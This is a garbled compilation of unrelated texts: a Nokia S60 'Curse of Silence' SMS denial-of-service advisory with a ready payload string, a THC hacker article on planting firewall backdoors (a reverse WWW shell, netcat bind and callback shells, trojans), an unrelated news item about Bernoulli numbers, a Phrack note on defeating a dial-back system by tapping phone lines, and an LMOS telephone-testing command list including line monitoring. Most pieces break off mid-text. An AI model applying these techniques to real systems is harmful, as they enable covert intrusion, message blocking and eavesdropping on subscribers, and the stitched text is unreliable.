Obamarket

Affected Products
=================

All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at
the end of the document.


Requirements to Execute Attack
==============================

- MSISDN of the target
- mobile phone contract that allows sending of SMS messages
- (almost) any Nokia phone (or some other means of sending SMS
messages with TP-PID set to "Internet Electronic Mail")


Risk Level
==========

Medium (for S60 2.8 and 3.1 devices): Target will not be able to
receive any SMS or MMS messages while the attack is ongoing. After
that, only very limited message receiving is possible until the device
is Factory Resetted

High (for S60 2.6 and 3.0 devices): Target will not be able to receive
any SMS or MMS messages until the device is Factory Resetted


Summary
=======

Emails can be sent via SMS by setting the messages Protocol Identifier
to "Internet Electronic Mail" and formatting the message like this:



If such messages contain an with more than 32
characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive
other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after
only one message, 2.8 and 3.1 devices after 11 messages.


Details
=======

3GPP TS 23.040 specifies a method for sending emails via SMS in
section 3.8 ("SMS and Internet Electronic Mail interworking"). In its
most basic form, such a SMS message starts with the from- (MT-SMS) or
to-email-address (MO-SMS), followed by a space character, and then the
message body. The TP-Procotol-Identifier of the SMS message has to be
set to "Internet Electronic Mail" (value: 50 / 0x32).

It is not specified how such a message should be displayed when
received by the phone. Before S60 2.6, Series60 devices displayed such
messages exactly as they were sent. Starting with S60 2.6, when the
part of the message that should contain the from-address looks
anything like an email address (i.e. it contains an "@" somewhere),
this address is then displayed as the message sender instead of the
usually shown TP-Originating-Address.

If this email address is longer than 32 characters, Series60 2.6, 2.8,
3.0 and 3.1 devices fail to display the message or give any indication
on the user interface that such a message has been received. They do,
however, signal to the SMSC that they received the message by sending
an RP-ACK.

Devices running S60 2.6 or 3.0 will not be able to receive any other
SMS message after that. The user interface does not give any
indication of this situation. The only action to remedy this situation
seems to be a Factory Reset of the device (by entering "*#7370#").

Devices running S60 2.8 or 3.1 react a little different: They do not
lock up until they received at least 11 SMS-email messages with an
email address that is longer than 32 characters. The device will not
be able to receive any other SMS message after that - upon receiving
the next message, the phone will just display a warning that there is
not enough memory to receive further messages and that data should be
deleted first. This message is even displayed on an otherwise
completely "empty" device.

After switching the phone off and on again, it has limited capability
for receiving SMS messages again: If it receives a SMS message that is
split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated
Short Messages) it is only able to receive the first part and will
display the "not enough memory" warning again. After powercycling the
device again, it can then receive the second part. If there is a third
part, it has to be powercycled again, and so on.

Also, an attacker now just needs to send one more "Curse Of Silence"
message to lock the phone up again. By always sending yet another one
as soon as the status report for delivery of the previous message is
received, the attacker could completely prevent a target from
receiving any other SMS/MMS messages.

Only Factory Resetting the device will restore its full message
receiving capabilities. Note that, if a backup is made using Nokia
PC-Suite *after* being attacked, the blocking messages are also
backuped and will be sent to the device again when restoring the
backup after the Factory Reset.

Note that not being able to receive SMS messages also means not being
able to receive MMS messages, since they are signalled by sending an
SMS message to the device.

"Curse Of Silence" messages can be generated with any phone or
cellular modem that supports 3GPP TS 27.005 AT commands and with most
Nokia phones also directly from the user interface. For example, on
S60 devices, when in the message editor, the type of the message can
be switched to "E-mail" under "Options" -> "Sending options" ->
"Message sent as". The 6310i conveniently offers a "Write email" menu
entry in the messaging menu.

The simplest form of content for a Curse Of Silence would be something
like "123456789@123456789.1234567890123 " (the digits are used only to
illustrate the length of the "email address" of more than 32
characters). Note the space at the end of the message!


Workaround
==========

None known for the user side.

Until a firmware fix is available, network operators should filter
messages with TP-PID "Internet Electronic Mail" and an email address
of more than 32 characters or reset the TP-PID of these messages to 0.


Credits
=======

Tobias Engel
November 9, 2008

Many thanks to Frank Rieger for spending countless hours cutting and
editing the video.


Detailed List of Affected Products
==================================

Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable
component is a S60 base functionality, it seems safe to assume that
all devices with these OS versions are affected.

S60 3rd Edition, Feature Pack 1 (S60 3.1):
Nokia E90 Communicator
Nokia E71
Nokia E66
Nokia E

Introduction

This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system.

Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does it's job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.

As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.




----[ Firewall Architectures

There are two basic firewall architectures and each has an enhanced version.

Packet Filters:

This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags.
This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).

Stateful Filters:

This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of the state information such as TCP sequence numbers. Some pay attention to application protocols which allows tricks such as only opening ports to the interiour network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (Thats because UDP is a stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.

Proxies / Circuit Level Gateways:

A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installe.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd.

Application Gateways:

This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp only may download data but not upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One can argue that squid is an application gateway, because it does many sanity checks and let you filter stuff but it was not programmed for the installation in a secure environment and still has/had security bugs.
A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk).

Most firewalls that vendors sell on the market are hybrid firwalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-by-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.


----[ Getting in

Before we talk about what backdoors are the best for which firewall architecture we should shed a light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies, this has to be carefully planned and done.

The four main possibilities:

Insider:

There's someone inside the company (you, girl/boy-friend, chummer) who installs the backdoor. This is the easiest way of course.

Vulnerable Services:

Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you'd see how many "firewalls" run sendmail for mail relaying ...

Vulnerable External Server:

People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif picture on a web server with one which crashs netscape and executes a command (I never checked if this actually works, it crashs, yeah, but I didn't look through this if this is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get it. This is particulary true for the US, where academic environments and industry/military work close together.

Hijacking Connections:

Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X).

Trojans:

Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone running this, mail spoofing could be used or replacing originals on an external server which internal employees access to update their software regulary (ftp xfer files and www logs can be checked to get to know which files these are).




----[ Placing the Backdoors

An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regulary. It's the internal machines which are usually unprotected and without much administration and security checks.

I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would run on an stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen.

Packet Filters:

It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which comes into my mind
is a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).
b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But some coding would be needed to to be done.
c) daemonshell-udp is a backdoor shell via UDP
(http://www.thc.org look for thc-uht1.tgz)
d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.

Stateful Filters:

Here a hacker must use programs which initiates the connection from the secure network to his external 0wned server. There are many out there which could be used:
active:
tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's a legtimitate program on a computer and it encrypts the datastream). passive:
netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package (see above) does the same.

Proxies / Circuit Level Gateways:
If socks is used on the firewall, someone can use all those stuff for the stateful filter and "socksify" them. (www.socks.nec.com) For more advanced tools you'd should take a look at the application gateway section.

Application Gateways:
Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed.
active:
(re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/ checked/audited and accessible from the internet. I hope nobody needs an example on such a thing ;-)
(re-placing) a service/binary on the firewall. This is dangerous because those are audited regulary and sometimes even sniffed on permanent ...
Loading a loadable module into the firewall kernel wich hides itself and gives access to it's master. The best solution for an active backdoor but still dangerous. passive:
E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in real the answers of commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell)
DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example needs still much coding to be any effective)




----[ Backdoor Example: The Reverse WWW Shell

This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company.
For a better understanding take a look at the following picture and try to remember it onwards in the text:

+--------+ +------------+ +-------------+
|internal|--------------------| FIREWALL |--------------|server owned |
| host | internal network +------------+ internet |by the hacker|
+--------+ +-------------+
SLAVE MASTER

Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends it ready signal. The legitimate looking answer of the www server owned by the hacker are in reality the commands the child will execute on it's machine it the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-string to prevent caching.

Example of a connection:

Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0

Master replies with
g5mAlfbknz

The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks:

The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; program masks it's name in the process listing ...

Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect.

Well, why coding it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl install, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.

The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://www.thc.org for updates.


----[ The Source

Grab it here ...

rwwwshell v2.0


----[ Security

Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. email should be put on a centralized mail server, and DNS resolving only done on the WWW/FTP proxies and access to WWW only prior proxy authentication. However, this is not enough. An attacker can tamper the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also checking the DNS and WWW logs/caches regulary with good tools can be defeated by switching the external servers every 3-20 calls or use aliases.

A secure solution would be to set up a second network which is connected to the internet, and the real one kept seperated - but tell this the employees ... A good firewall is a big improvement, and also an Intrusion Detection Systems can help. But nothing can stop a dedicated attacker.

----[ Last Words

Have fun hacking/securing the systems ...
Greets to all guys who like + know me ;-) and especially to those good
chummers I've got, you know who you are.

Ciao...
van Hauser / [THC] - The Hacker's Choice


For further interesting discussions you can email me at
vh@reptile.rug.ac.be with my public pgp key blow:

Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i

mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYNOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----

----[ THE END

STOCKHOLM (AFP) – A 16-year-old Iraqi immigrant living in Sweden has kracked a maths puzzle that has stumped experts for more than 300 years, Swedish media reported on Thursday.
In just four months, Mohamed Altoumaimi has found a formula to explain and simplify the so-called Bernoulli numbers, a sequence of calculations named after the 17th century Swiss mathematician Jacob Bernoulli, the Dagens Nyheter daily said.
Altoumaimi, who came to Sweden six years ago, said teachers at his high school in Falun, central Sweden were not convinced about his work at first.
"When I first showed it to my teachers, none of them thought the formula I had written down really worked," Altoumaimi told the Falu Kuriren newspaper.
He then got in touch with professors at Uppsala University, one of Sweden's top institutions, to ask them to check his work.
After going through his notebooks, the professors found his work was indeed correct and offered him a place in Uppsala.
But for now, Altoumaimi is focusing on his school studies and plans to take summer classes in advanced mathematics and physics this year.
"I wanted to be a researcher in physics or mathematics; I really like those subjects. But I have to improve in English and social sciences," he told the Falu Kuriren.

(314)432-0756
24 Hours A Day, 300/1200 Baud

Presents...

==Phrack Inc.==
Volume One, Issue One, Phile 2 of 8

::>Hacking SAM - A Description Of The Dial-Up Security System<::
::>Written by Spitfire Hacker<::

SAM is a security system that is being used in many colleges
today as a security feature against intrusion from the outside. This
system utilizes a dial-back routine which is very effective. To
access the computer, you must first dial the port to which SAM is
hooked up. The port for one such college is located at (818) 885-
2082. After you have called, SAM will answer the phone, but will make
no other responses (no carrier signals). At this point, you must
punch in a valid Login Identification Number on a push-button phone.
The number is in this format -- xxyyyy -- where xx is, for the number
mentioned above, 70. 'yyyy' is the last 4 digits of the valid user's
telephone number.
If a valid LIN is entered, SAM will give one of 3 responses:
1) A 1 second low tone
2) A 1 second alternating high/low tone
3) A tone burst

Responses 1 and 2 indicate that SAM has accepted your passcode and is
waiting for you to hang up. After you hang up, it will dial the valid
users phone number and wait for a second signal.

Response 3 indicates that all of the outgoing lines are busy.

If SAM accepts your passcode, you will have to tap into the valid
users line and intercept SAM when it calls. If you do this, then hit
the '*' key on your phone. SAM will respond with a standard carrier,
and you are in!

That's all that I have hacked out so far, I will write more
information on the subject later.

Spitfire Hacker
2600 Club!

                     Volume Two, Issue 18, Phile #8 of 11

                                 Control C

                                    and

                   The Tribunal of Knowledge presents...

                  LMOS (Loop Maintenance Operation System)

                            -A List of Commands-

   This file contains what to our knowledge are the best things to do on
LMOS.  We were really vague due to the great power of the information provided
in this file.  You now know the commands so we will not go into (either in
this file or when talking to us) how to use this information, it is up to you
to figure out how to use it.

+:  Increase the voice volume on a line

+ lets you increase the volume when you are talking on or monitoring a
sub-scriber's line over a callback path.  The volume is increased because MLT
adds amplifier to the line.  + may be used after a mon, talk, rev, talkin or
call request.  Sometimes MLT adds an amplifier automatically to a long line.
You will not know it is there so if you try to add amplification, a + will
appear in the status sections but the voices will not get any louder because
they are already loud as possible.

-:  Decrease the voice volume on a line

- lets you decrease the volume when you are talking on or monitoring a
subscriber's line over a callback path.  The volume is decreased because MLT
removes amplifier from the line.  - may be used to remove amplifier that you
have placed on the line with the + request, or amplifier that MLT has
automatically places on a long line.  The main reason to remove the amplifier
is because it can sometimes cause a shrill or howl.

Call:  Make a call on a subscriber's line

Call lets you use your touch-tone pad to dial any number you want using the
customer's line circuit.  It does this by simulating an off-hook condition in
order to draw dial tone.  A callback number is a required entry on the tv mask
and an mdf access is required for calling out (except in SXS and panel
offices).  You can use a call when:  1) You want to know the TN for a known CA
& PR - you would call TSPS or ANI.  2) Calls cannot be completed to a TN - you
would call that TN.  3) To monitor dial tone on a customer's line.

Callrd:  Make a call on a dial pulse line circuit

Callrd lets you use your touch-tone pad to dial using the customer's rotary
dial line circuit.  MLT does this by translating tones on a customer's line.
mdf access is required for calling out (except in SXS, DMS10, DMS100, and
DMS100AC offices).  Use a callrd if you want to know the TN for a known CA &
PR - you would call TSPS or ANI.

Ccol:  Collect coins using coin relay

Ccol attempts to collect any coins that are in the hopper of a coin telephone
set by operating the coin relay.  Ccol does not check the totalizer or check
the rest of the line.  The results tell you only about relay operation, speed,
and the current that is necessary to operate it.  A ver code is not returned
by ccol.  You must have access to the line before your request ccol.  You will
use ccol most often when you are talking to a repair person who is trying to
fix a coin phone.

Channel:  Run enhanced channel tests on DLC lines

Chan or channel runs channel isolation tests and tells you if you have a bad
COT or RT channel unit.  Use this request to run enhanced channel tests on
lines served by digital loop carriers such as SLC Series 5.  Chan can only be
run if there is special equipment in the co you're testing in.  If you are
testing a non-locally switched line with the SSA request, channel tests must
be run separately with this request.  Chan may also be used to run channel
isolation tests on switched lines from the tv or stv mask, but these tests are
included when you do a full or loop on a switched line.

Change:  Change status information

Change allows you to change cable, pair or comment information that is
displayed without having to request a test or any other type of information.
the permanent line record information is not changed.  To request a change,
enter "change" in the req field of the tv and enter the change of information.

Chome:  Home totalizer on a coin telephone

Chome attempts to return a totalizer to the starting position (home) for
counting coins.  The totalizer counts the coins and sends a tone back to the
co for every 5 cents deposited.  If it is not homed, coins can't be deposited.
A chome request tells you whether the totalizer was homed, how many tones were
sent to the co, and the current that was used to home the totalizer.  A line
must already be accessed to request a chome.  Chome is often used when a
repair person is trying to fix a coin telephone.

Co:  Test the central office equipment

Co initiates a series of tests on the subscriber's line circuit.  Co can be
requested using either a no-test or an MDF trunk.  A no-test access connects
you to the entire loop but a co request tests only the inside portion.  An MDF
access is only connected to the inside portion of the loop.  The outside
portion is physically disconnected.  Use a no-test access when you are fairly
sure the trouble is inside the central office.  Use a co on an MDF access when
you are not sure where the trouble is.

Coin:  Test a coin telephone set

Coin initiates a full series of tests on a telephone line.  The station set,
the totalizer, the coin relay, the loop and the co equipment are checked.  If
the coin request finds something wrong with either the totalizer or the relay,
it stops testing and tells you the trouble is in the set.  If it finds nothing
wrong, it runs the full entries of tests.  Coin may be used when a repair
person is trying to fix a coin telephone.  If a coin phone is newly installed,
coin will check the set even though there is no line record.

Cret:  Operate coin relay to return coins

Cret attempts to return any coins that may be lodged in the hopper of a coin
telephone set.  It operates the coin relay so that it will return the coins.
It tries to return them 3 times before giving up.  If it is successful, it
also checks the speed of the relay.  It does not check the totalizer or the
rest of the line.  You should have access to the line before you request a
cret.  You will use cret primarily when you are talking to a repair person who
is trying to repair coin telephone.

Cset:  Check totalizer and relay in coinset

Cset checks the totalizer and the coin relay in a coin telephone set.  The
totalizer is the mechanism in the phone that counts deposited coins and sends
a tone back to the co for every 5 cents that is deposited.  The relay is the
mechanism that either returns or collects the coins that are deposited.  Cset
does not check the co or loop parts of the line.  Cset can be used when you
are talking to a repair person who is fixing a coin telephone.

Dial:  Test a subscriber's rotary dial

Dial checks the subscriber's rotary dial.  You must be in contact with the
subscriber,either over a callback path or over a ddd line.  For the dial
request to work correctly, tell the subscriber to dial a "0" after hearing
brief dial tone.  The results of a dial request tell you whether the dial is
okay or not, whether the dial speed is okay and what the speed is, and whether
the break is okay and what the break is.  Use the dial request when you
suspect a problem with the telephone set.  The trouble report could be "Can't
call out' or 'Gets wrong numbers", for example.

Dtout:  Test a pbx line circuit

Dtout initiates a series of tests on a pbx line circuit.  Dtout must be
requested using an MDF trunk.  It is used to draw dial tone and check the
arrangement of the pbx line circuit.  Use dtout when you need to check the
condition of special service circuits that do not use central office switches.

Full:  Test the entire telephone line

Full starts a series of tests that do an extensive analysis of the entire
line. This includes both the inside and outside portions.  Many individual
tests are run and the most important results are displayed in the summary
message. Outside, MLT checks for AC and DC faults.  Inside, it checks the line
circuit and dial tone.  The results may also include many other types of
information about the line.  You might request full line test when you first
access a line or when you need to know a lot about a line.

Grm:  Get fast ground resistance measurement

Grm gives you a quick measurement of the DC resistance of the ground path from
the strap to the test hardware.  Before you do a grm, have the repair person
strap the tip and ring wires to ground.  If this isn't done, grm will give you
incorrect values.  The line must be accessed before you do a grm request.  You
can use grm when you are talking to a repair person who is fixing a coinset.
The resistance values obtained from a grm can be compared to old resistance
values that are stored inside each coinset.

Help:  List the valid tv requests

Help returns a list of all of the valid requests used in MLT-2.  Help can be
used when you are not sure which request to use in a particular situation, or
when you can't remember an exact request name.  For example, the correct entry
to reverse polarity on a touch-tone line is "Rev.", help will tell you this.
For a description of any specific request, enter the name of the request
followed by a question mark.

Info:  Get general information about a line

Info gives you the wire center name and the location of the frame; the
exchange key, MDF group and MDF trunk numbers associated with the subscriber's
line; the telephone number at the appropriate frame; and the assignment
telephone number. You can get information about a whole telephone number, an
NPA-NXX-, or an exchange key.  MLT does not access the line when you request
info, but it keeps access if you already have it.  If there are multiple
frames in an office, MLT give you information about all of them.

Keep:  Keep an access that you already have

Keep lets you hold access to a no-test or MDF trunk that is about to
"timeout."  MLT keeps track of which trunks you have accessed but have not
used for a while.  MLT will automatically drop the access for you after a
certain period of time.  About 2 minutes before dropping the access, MLT gives
you a warning message and also highlights the status line that will be
dropped.  If you want to keep the access, you should enter "keep" in the req
field and the tn or line number of the access to be held.  To drop an access
when your are finished with it, enter an x in the req field.

Lin:  Test the inside part of the loop

Lin starts a series of tests on the inside portion of a line.  Lin includes
the same tests as the loop test and can identify a co line circuit if one is
present.  Lin does not do the regular line circuit and draw and break dial
tone tests.  An MDF access is required for a lin request.  You can use lin to
test special circuit that do not use co switching machine.  For example, if
the circuit has 2 loops connected at the frame, lin lets you look at the
second loop (both full and loop only test toward one loop).

Lloop:  Run the long loop analysis on the outside or loop part of a line

The ll request starts a series of tests which do extensive analysis of the
outside portion of the subscriber's line.  It is specifically designed to
handle cases that the regular loop request was not designed to handle.  These
cases include very long loops (over 100,000 feet) and multiparty lines on
moderate-to-very-long loops.  It does similar measurements to those that loop
does, but analyzes the results differently.  It expects to see a loop that has
no dc faults or only very light dc faults.  If you use a loop on lloop on a
loop that has serious dc faults it will not do the long loop analysis.

Loc1:  Measure distance to 1-sided resistive fault

Loc1 gets MLT to measure how far a one-sided fault is from the repair person,
because telephone lines can be very long, it can be difficult for a repair
person to find the location of a resistive fault.  You can use loc1 to help
the repair person have 1-sided fault.  You should be in contact with the
repair person on a line other than the one being measured.  Have the repair
person open the pr at a ready-access point beyond the fault if possible.  Ask
him/her to strap the pr tip to ring.  Remember to enter a temperature on the
tv mask before you transmit the loc1 request.

Loc2:  Measure distance to 2-sided resistive fault

Loc2 gets MLT to measure how far a two-sided fault is from the repair person.
Remember that you must run a locgp before you run a loc2 and that you must be
in contact with the repair-person on a line other than the one you will be
measuring.  The repair-person must connect the bad pair to the good pair in a
specific way, the exact method to use is explained in the results of the locgp
request.  Logcp and loc2 can also be used to sectionalize a one-sided
resistive fault.  Remember to enter a temperature on the tv mask before you
transmit the loc2 request.

Look:  Look for an intentional fault

Look is used to identify a fault, usually a short or ground, that has been
placed on the line by the repair person.  Look can be used when a repair
person is having trouble locating a particular line.  Look gets MLT to monitor
the line that the repair person is looking for.  When the repair person shorts
or grounds the line, mlt sends a tone to you over your headset.  You can tell
the repair person that you "see the short".  A callback path is required for a
look request.  You should talk to the repair person on a line other than the
one you are working on.

Lookin:  Look for an intentional fault on a special services line

Lookin is used to identify a fault, usually a short or ground, that has been
placed on the special services line by the technician.  Lookin is used to
locate a particular line by having MLT monitor the line that the repair person
is looking for.  When the repair person shorts or grounds the line, MLT sends
a tone to you over your headset.  You can tell the repair person that you "See
the short."  A callback path is required for a lookin quest.  You should talk
to the repair person on a line other than the one you are working on.  MDF
access is required.

Loop:  Test the outside part of the loop

Loop starts a series of tests that do an extensive analysis of the outside
portion of the line.  Loop does every test that full does except the line
circuit and draw and break dial tone tests.  Loop can be requested using
either a no-test or an MDF trunk.  A no-test access connects you to the entire
line but a loop request tests only the outside portion.  An MDF access is only
connect to the outside portion.  Use a no-test trunk when you are fairly sure
the trouble is out of the co and an MDF when you are not sure.

Lrm:  Get fast loop resistance measurement

lrm gives you a quick measurement of the DC resistance on a line.  Lrm can't
be run unless either the receiver is off-hook or the line is strapped tip to
ring (an intentional short is placed on the line by the repair person).  Also,
MLT will not accept an lrm request if there is a hard ground on the line.  Lrm
does not access the line so you must already have access to do an lrm.  You
can use lrm when you are talking to a repair person who is fixing a coinset.
The resistance values obtained from the lrm can be compared to the old
resistance values that are stored inside each coinset.

MDF(#):  Access a specific MDF trunk

MDF(#) lets you choose the MDF trunk that you want MLT to access.  Use this
request when an MDF trunk is connected to a telephone line at the MDF but is
not connected to the loop testing system.  This may occur in small offices
where the frame attendant doesn't work for the entire day.  You can also use
this request when an MDF trunk has to be tested and repaired.  The MDF entry
must be a five character entry consisting of the wire center identifier and
the trunk number.

Mdf:  Access a main distributing frame (MDF)

MDF connects the mlt testing equipment to an MDF trunk.  Before you can enter
any requests, you must have the frame attendant connect the MDF trunk to the
subscriber's line.  Remember that MLT automatically accesses a no-test trunk
unless you specifically request an MDF trunk.  An MDF trunk goes directly from
the loop testing system to the main distributing frame.  Bypassing the central
office switch.  Using an MDF trunk allows you to test loops that are connect
to co equipment that is not MLT-testable.  Also, you can sectionalize a fault
in or out of the co by testing "in" or "out" using MDF.

MDF(gr):  Access a trunk from a certain mdf trunk group

MDF(gr) lets you choose the MDF trunk group from which MLT will choose an MDF
trunk.  Use the MDF(gr) request when the NPA-NXX that you are using has more
than one frame associated with it and you can't enter cable and pair numbers.
For example, to request MDF trunk group a, you should enter MDFA in the req
field.  To find out which trunk groups are available for your NPA-NXX you can
either enter an mdf or an info request.  Remember that you still have to call
the frame attendant to have the trunk and line connected and also disconnect
when you are finished.

Mdfin:  Test the inside part of a line

Mdfin starts a series of tests that do an extensive analysis of the inside
line.  This includes line circuit and dial tone tests.  The mdfin request uses
a special line that runs from the MLT testing equipment to the MDF.  You must
ask the frame attendant to connect this line to the subscriber's line.  Then
you must enter the telephone number of this special line on the test mask
along with mdfin and the subscriber's number.  For more information see the
mdfio module in the MLT-2 user guide.

Mdfout:  Test the outside part of a line

Mdfout starts a series of tests that do an extensive analysis of the outside
line.  This includes the DC and AC tests.  The mdfout request uses a special
line that runs from the mlt testing equipment to the MDF.  You must ask the
frame attendant to connect this line to the subscriber's line.  Then you must
enter the telephone number of this special line on the test mask along with
mdfin and the subscriber's number.

Mon:  Monitor a subscriber's line

Mon lets you monitor a subscriber's line.  Sometimes you are a better judge of
whether there is noise, speech, or a recording on a line than MLT is.  If you
want to listen to a line to determine if one of these conditions does exist,
use the mon request.  You can also be automatically placed in the monitor mode
